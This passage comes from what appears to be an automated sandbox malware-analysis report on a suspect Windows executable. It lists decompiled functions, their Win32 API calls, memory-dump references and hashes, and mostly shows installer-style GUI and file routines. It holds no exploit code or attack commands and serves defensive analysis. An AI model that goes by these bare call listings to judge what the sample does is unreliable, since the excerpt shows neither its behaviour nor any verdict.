                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.28253101545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253173112.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28254037371.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                                                                • Opcode ID: 33429e90f145919918c0f5a16300b6ae2cb664e9c61a266d81822a9c1fb78e21
                                                                                                                                                                                • Instruction ID: 9ccc480ae856a8f761d654a46a9a0801f91457f8e33b58f107ae6609e89c6df3
                                                                                                                                                                                • Opcode Fuzzy Hash: 33429e90f145919918c0f5a16300b6ae2cb664e9c61a266d81822a9c1fb78e21
                                                                                                                                                                                • Instruction Fuzzy Hash: 51B09235181A00AADE914B00DE09F457A62A7A4701F00C029B241240B4CAB200A4DB0A
                                                                                                                                                                                Function 00404366 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • KiUserCallbackDispatcher.NTDLL(?,0040413D), ref: 00404370
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.28253101545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253173112.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28254037371.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CallbackDispatcherUser
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2492992576-0
                                                                                                                                                                                • Opcode ID: fb2bbd85db119072699d8509dbb0c67ddc0fed6d182cd9e62e167e16add427de
                                                                                                                                                                                • Instruction ID: f32ebe17383345fd09930a0b12515434b8b37a693fa3d318b2a69664ac7713bd
                                                                                                                                                                                • Opcode Fuzzy Hash: fb2bbd85db119072699d8509dbb0c67ddc0fed6d182cd9e62e167e16add427de
                                                                                                                                                                                • Instruction Fuzzy Hash: 97A00176405540AFEE029B61EF09D4ABB72ABA9701B4185B9A286A0034CB364860EB1D
                                                                                                                                                                                Function 004014D7 Relevance: 1.3, APIs: 1, Instructions: 19sleepCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • Sleep.KERNELBASE(00000000), ref: 004014EA
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.28253101545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253173112.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28254037371.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Sleep
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3472027048-0
                                                                                                                                                                                • Opcode ID: 105fb3db34f0ab7e38f6648118bc74ea061e25b53dce703b88c99de24f5127b8
                                                                                                                                                                                • Instruction ID: a18cf0c9a9b021ee27972f2e0a35f90bb7c2f66644072f7244457554decb08b2
                                                                                                                                                                                • Opcode Fuzzy Hash: 105fb3db34f0ab7e38f6648118bc74ea061e25b53dce703b88c99de24f5127b8
                                                                                                                                                                                • Instruction Fuzzy Hash: 0AD05EB3A201008BC700DFB8BE8545E73B8EA903193308837D452E2091E6B889518629

                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                Function 00404835 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 275stringCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetDlgItem.USER32(?,000003FB), ref: 00404884
                                                                                                                                                                                • SetWindowTextW.USER32(00000000,?), ref: 004048AE
                                                                                                                                                                                • SHBrowseForFolderW.SHELL32(?), ref: 0040495F
                                                                                                                                                                                • CoTaskMemFree.OLE32(00000000), ref: 0040496A
                                                                                                                                                                                • lstrcmpiW.KERNEL32(Call,007A1F48,00000000,?,?), ref: 0040499C
                                                                                                                                                                                • lstrcatW.KERNEL32(?,Call), ref: 004049A8
                                                                                                                                                                                • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004049BA
                                                                                                                                                                                  • Part of subcall function 00405A38: GetDlgItemTextW.USER32(?,?,00000400,004049F1), ref: 00405A4B
                                                                                                                                                                                  • Part of subcall function 0040669D: CharNextW.USER32(?,*?|<>/":,00000000,00000000,76F43420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\02Eh1ah35H.exe",0040347D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036EC,?,00000007,00000009,0000000B), ref: 00406700
                                                                                                                                                                                  • Part of subcall function 0040669D: CharNextW.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 0040670F
                                                                                                                                                                                  • Part of subcall function 0040669D: CharNextW.USER32(?,00000000,76F43420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\02Eh1ah35H.exe",0040347D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036EC,?,00000007,00000009,0000000B), ref: 00406714
                                                                                                                                                                                  • Part of subcall function 0040669D: CharPrevW.USER32(?,?,76F43420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\02Eh1ah35H.exe",0040347D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036EC,?,00000007,00000009,0000000B), ref: 00406727
                                                                                                                                                                                • GetDiskFreeSpaceW.KERNEL32(0079FF18,?,?,0000040F,?,0079FF18,0079FF18,?,00000001,0079FF18,?,?,000003FB,?), ref: 00404A7D
                                                                                                                                                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404A98
                                                                                                                                                                                  • Part of subcall function 00404BF1: lstrlenW.KERNEL32(007A1F48,007A1F48,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404C92
                                                                                                                                                                                  • Part of subcall function 00404BF1: wsprintfW.USER32 ref: 00404C9B
                                                                                                                                                                                  • Part of subcall function 00404BF1: SetDlgItemTextW.USER32(?,007A1F48), ref: 00404CAE
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.28253101545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253173112.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28254037371.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                • String ID: A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires$Call
                                                                                                                                                                                • API String ID: 2624150263-3018202500
                                                                                                                                                                                • Opcode ID: d6791cdbf7c3281003b221a05808b40c9ad422951b6e996bdb0757aefb9ec102
                                                                                                                                                                                • Instruction ID: 411b0bed4dd1c8854bcfe70218cd405116d93f5cc49f5f9e093397eef6854a11
                                                                                                                                                                                • Opcode Fuzzy Hash: d6791cdbf7c3281003b221a05808b40c9ad422951b6e996bdb0757aefb9ec102
                                                                                                                                                                                • Instruction Fuzzy Hash: 78A17FB1A00209ABDB11EFA5CD81AAF77B8EF84314F10843BF601B62D1D77C99418F69
                                                                                                                                                                                Function 004021A2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402221
                                                                                                                                                                                Strings
                                                                                                                                                                                • C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires, xrefs: 00402261
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.28253101545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253173112.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28254037371.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CreateInstance
                                                                                                                                                                                • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires
                                                                                                                                                                                • API String ID: 542301482-3207577588
                                                                                                                                                                                • Opcode ID: fcc22c8f01bdbcdde705d89c617478103ccb94e093c9448482791b895915191b
                                                                                                                                                                                • Instruction ID: 318f5a272383e4943f9a7a1f828131c4cf43be91e798f39f03958dcf779540d2
                                                                                                                                                                                • Opcode Fuzzy Hash: fcc22c8f01bdbcdde705d89c617478103ccb94e093c9448482791b895915191b
                                                                                                                                                                                • Instruction Fuzzy Hash: 67412771A00208AFCF00DFE4C989A9E7BB6FF48304B2045AAF515EB2D1DB799981CB54
                                                                                                                                                                                Function 00402902 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402911
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.28253101545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253173112.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28254037371.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FileFindFirst
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1974802433-0
                                                                                                                                                                                • Opcode ID: 0c7a6b2e424a680001b31c7f103c053843ada1fe5638dd2d7c3b01ec370ff8d4
                                                                                                                                                                                • Instruction ID: c1f6bc4fbd4392edc64dd94dfb26af21a0adc514685abdce03c7c09792edecab
                                                                                                                                                                                • Opcode Fuzzy Hash: 0c7a6b2e424a680001b31c7f103c053843ada1fe5638dd2d7c3b01ec370ff8d4
                                                                                                                                                                                • Instruction Fuzzy Hash: FAF08CB1A00104ABC700DFA4DD499AEB378EF10324F70857BE911F21E0D7B89E109B3A
                                                                                                                                                                                Function 00404DB1 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 490windowmemoryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetDlgItem.USER32(?,000003F9), ref: 00404DC8
                                                                                                                                                                                • GetDlgItem.USER32(?,00000408), ref: 00404DD5
                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 00404E21
                                                                                                                                                                                • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404E38
                                                                                                                                                                                • SetWindowLongW.USER32(?,000000FC,004053CA), ref: 00404E52
                                                                                                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404E66
                                                                                                                                                                                • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404E7A
                                                                                                                                                                                • SendMessageW.USER32(?,00001109,00000002), ref: 00404E8F
                                                                                                                                                                                • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404E9B
                                                                                                                                                                                • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404EAD
                                                                                                                                                                                • DeleteObject.GDI32(00000110), ref: 00404EB2
                                                                                                                                                                                • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404EDD
                                                                                                                                                                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404EE9
                                                                                                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F84
                                                                                                                                                                                • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404FB4
                                                                                                                                                                                  • Part of subcall function 00404379: SendMessageW.USER32(00000028,?,00000001,004041A4), ref: 00404387
                                                                                                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404FC8
                                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00404FF6
                                                                                                                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00405004
                                                                                                                                                                                • ShowWindow.USER32(?,00000005), ref: 00405014
                                                                                                                                                                                • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405115
                                                                                                                                                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00405177
                                                                                                                                                                                • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 0040518C
                                                                                                                                                                                • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004051B0
                                                                                                                                                                                • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004051D3
                                                                                                                                                                                • ImageList_Destroy.COMCTL32(?), ref: 004051E8
                                                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 004051F8
                                                                                                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405271
                                                                                                                                                                                • SendMessageW.USER32(?,00001102,?,?), ref: 0040531A
                                                                                                                                                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405329
                                                                                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00405353
                                                                                                                                                                                • ShowWindow.USER32(?,00000000), ref: 004053A1
                                                                                                                                                                                • GetDlgItem.USER32(?,000003FE), ref: 004053AC
                                                                                                                                                                                • ShowWindow.USER32(00000000), ref: 004053B3
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.28253101545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253173112.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28254037371.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                • String ID: $M$N
                                                                                                                                                                                • API String ID: 2564846305-813528018
                                                                                                                                                                                • Opcode ID: 395346f0b34cdab504ac547572c6f4c5f93574bb04bab85a4e8054be4462e8f7
                                                                                                                                                                                • Instruction ID: 7baa9a5517a4605733e15ddb68db2cf5b5f1e79b3ae63259faab1fa91bacf49a
                                                                                                                                                                                • Opcode Fuzzy Hash: 395346f0b34cdab504ac547572c6f4c5f93574bb04bab85a4e8054be4462e8f7
                                                                                                                                                                                • Instruction Fuzzy Hash: 24127A70900609EFDB20CF65CC45AAF7BB5FB85314F10817AEA10BA2E1DB798951DF58
                                                                                                                                                                                Function 00404503 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 204windowstringCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004045A1
                                                                                                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 004045B5
                                                                                                                                                                                • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004045D2
                                                                                                                                                                                • GetSysColor.USER32(?), ref: 004045E3
                                                                                                                                                                                • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004045F1
                                                                                                                                                                                • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004045FF
                                                                                                                                                                                • lstrlenW.KERNEL32(?), ref: 00404604
                                                                                                                                                                                • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404611
                                                                                                                                                                                • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404626
